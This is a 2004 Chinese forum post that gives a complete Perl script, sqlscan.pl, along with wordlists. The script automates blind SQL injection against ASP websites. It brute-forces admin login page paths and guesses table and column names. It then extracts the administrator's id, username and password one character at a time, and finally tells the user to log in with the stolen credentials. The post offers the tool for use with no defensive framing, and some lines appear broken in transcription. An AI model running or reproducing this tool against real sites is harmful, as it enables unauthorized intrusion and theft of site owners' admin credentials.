ascc+asp自动注射代码，可以猜后台

sqlscan.pl
Submitted by superhei on 2004, July 8, 2:17 AM. 我的DD
#!/usr/bin/perl
#Codz By 黑嘿黑<[email protected]>2004/1/21.
#Thx MIX

$|=1;
use IO::Socket;

print "======================================================================= ";
print " The sqlform-find Script Codz By 黑嘿黑<QQ:123230273> ";
print " Our Team : www.cnse8.com ";
print " My Home : xyhack.91i.net ";
print "======================================================================= ";
print "Usage: sql.exe 127.0.0.1 80 /test/wenxue/readarticle.asp?id=3 测试成功 ";
print "----------------------------------------------------------------------- ";

if ($#ARGV<1)
if ($#ARGV>1){
$host=$ARGV[0];
$port=$ARGV[1];
$way=$ARGV[2];
$judge=$ARGV[3];}

open(DB, 'sqlfrom.txt') || die "Can't open splfrom.txt.";
@Form = <DB>;
close (DB);
open(L, 'lines.txt') || die "Can't open lines.txt.";
@lines = <L>;
close (L);
open(LG, 'login.txt') || die "Can't open login.txt.";
@login = <LG>;
close (LG);

foreach $log (@login){
chomp $log;
@res=str1();
foreach $check (@res){
($http,$code,$blah) = split(/ /,$check);
if($code == 200){
print "Kaka !! Find the login: http://$host$way1$log ";
}
}
}
foreach $sqlfrom (@Form){
chomp $sqlfrom;
$line="*";
@res=str();
@num=grep /$judge/, @res;
$size=@num;
if ($size > 0){
print " KaKa !! Find the sqlfrom is Uaa$sqlfromE: ";
foreach $line1 (@lines){
chomp $line1;
$line=$line1;
@res=str();
@num=grep /$judge/, @res;
$size=@num;
if ($size > 0){
print "a$line1 ";
}
}
}
}

print "aa Input the SQLForm of admin ! $SQLForm=";$SQLForm=<STDIN>;chomp $SQLForm;
print "$id=";$ids=<STDIN>;chomp $ids;
print "$Username=";$usernames=<STDIN>;chomp $usernames;
print "$Password=";$passwords=<STDIN>;chomp $passwords;
print " Now , Start to Crack ! Please wait...... ";

#under here is SQL Words
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20$ids=";
$path2 =")";
$id = crackint();
print " Successful,The id of the first admin's id is a$id . ";

$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20len($passwords)=";
$path2 = "%20and%20$ids=$id)";
$len = crackint();
print " Successful,The len of admin's password is a$len . ";

$path1 = "%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20left($passwords,";
$path2 = ")='";
$path3 = "'%20and%20$ids=$id)";
@password = crackchar();
print " Successful,The admin's password is aa@password . ";

$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20len($usernames)=";
$path2 = "%20and%20$ids=$id)";
$len = crackint();
print " Successful,The len of admin's name is $len . ";

$path1 = "%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20left($usernames,";
$path2 = ")='";
$path3 = "'%20and%20$ids=$id)";
@username = crackchar();
print " Successful,The admin's username is aa@username . ";

print "KaKa !! aayou can use username: @username password: @password to login test ! ";

sub crackint {
@dic=(1..100);
for ($i=0;$i<@dic;$i++)
{
my $path=$path1.$dic[$i];
my $path=$path.$path2;
$req = "GET $way$path HTTP/1.0 ".
"Referer: http://$host$way ".
"Host: $host ";
print "$dic[$i].";
sleep(1);
@in = sock($req);
@num=grep /$judge/, @in;
$size=@num;
if ($size > 0) {
return $dic[$i];
last;
}
}
}

sub crackchar {
my $pws;
my @dic11=(0..9);
my @dic12=(a..z);
my @dic13=(A..Z);
my @special=qw(` ~ ! @ # $ %25 ^ %26 * ( ) _ %2b = - { } [ ] : " ; < > ? | , . / );
my @special2=qw( ` ~ ！ · # ￥ % …… — * （ ） —— + - = { } [ ] ： ” “ ； ’ 《 》 ？ │ ， 。 / 、 〈 〉 ');
my @dic=(@dic11,@dic12,@dic13,@special,@special2);
for ($j=1;$j<=$len;$j++)
{
for ($i=0;$i<@dic;$i++)
{
my $key=$pws.$dic[$i];
my $path=$path1.$j;
my $path=$path.$path2;
my $path=$path.$key;
my $path=$path.$path3;

$req = "GET $way$path HTTP/1.0 ".
"Referer: http://$host$way ".
"Host:$host ";
print "$dic[$i].";
sleep(1);
@in =sock($req);
@num=grep /$judge/, @in;
$size=@num;
if ($size > 0) {
$th=$j.th;
print " Successful,The $th word of the char is $dic[$i] ";
$pws=$pws.$dic[$i];
last;
}
}
}

$pws=~s/\%2b/+/ig;
$pws=~s/\%25/\%/ig;
$pws=~s/\%26/&/ig;
return $pws;
}

sub str{
$path="%20and%20exists(select%20".$line."%20from%20$sqlfrom)";
$req = "GET $way$path HTTP/1.0 ".
"Host: $host ".
"Referer: $host ".
"Cookie: ";
sock($req);
}

sub str1{
@s=split(///,$way);
$s=@s;
$ss=@s[$i-1];
$d=length($ss);
$e=length($way);
$way1=substr($way,0,$e-$d);
$req = "GET $way1$log HTTP/1.0 ".
"Host: $host ".
"Referer: $host ".
"Cookie: ";
sock($req);
}

sub sock{
my ($req) = @_;
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host ";

print $connection $req;
my @res = <$connection>;
close $connection;
return @res;
}
sub usage {
print " Input the Host Info ! $Host=";$host=<STDIN>;chomp $host;
print "$Port=";$port=<STDIN>;chomp $port;
print "$Way=";$way=<STDIN>;chomp $way;
print "Input the Judge Words ! $Judge=";$judge=<STDIN>;chomp $judge;
}

=================== end =============================
sqlfrom.txt:

admin
user
users
userinfo
admin_userinfo
password
adminuser
manboard
diaryuseruser
pwd
t_user
用户
管理员

lines.txt:

id
userid
username
usr
admin
name
user
userpwd
password
pwd
passwd
psword
pass
pws
pwa
user_id
user_name
user_pass
admin_id
admin_name
admin_pass
admin_password
u_id
u_name
u_password
auid
apwd
姓名
密码

login.txt:

pass.asp
password.asp
psd.asp
username/login.asp
username/admin.asp
denglu.asp
login/admin.asp
login/login.asp
admin_login.asp
login_admin.asp
userlogin.asp
User.Asp
user/login.asp
admin/admin.asp
admin/login.asp
admin.asp
login.htm
admin_login/admin.asp
login_admin/login_admin.asp
login.asp
admpast.asp
admin_login.asp
adminlogin.asp
manageNews/index.htm
Admin/admin_login.asp
admin_index.asp
adminn/index.asp
admin/adminlogin.asp
admin/default.asp
manage/login.asp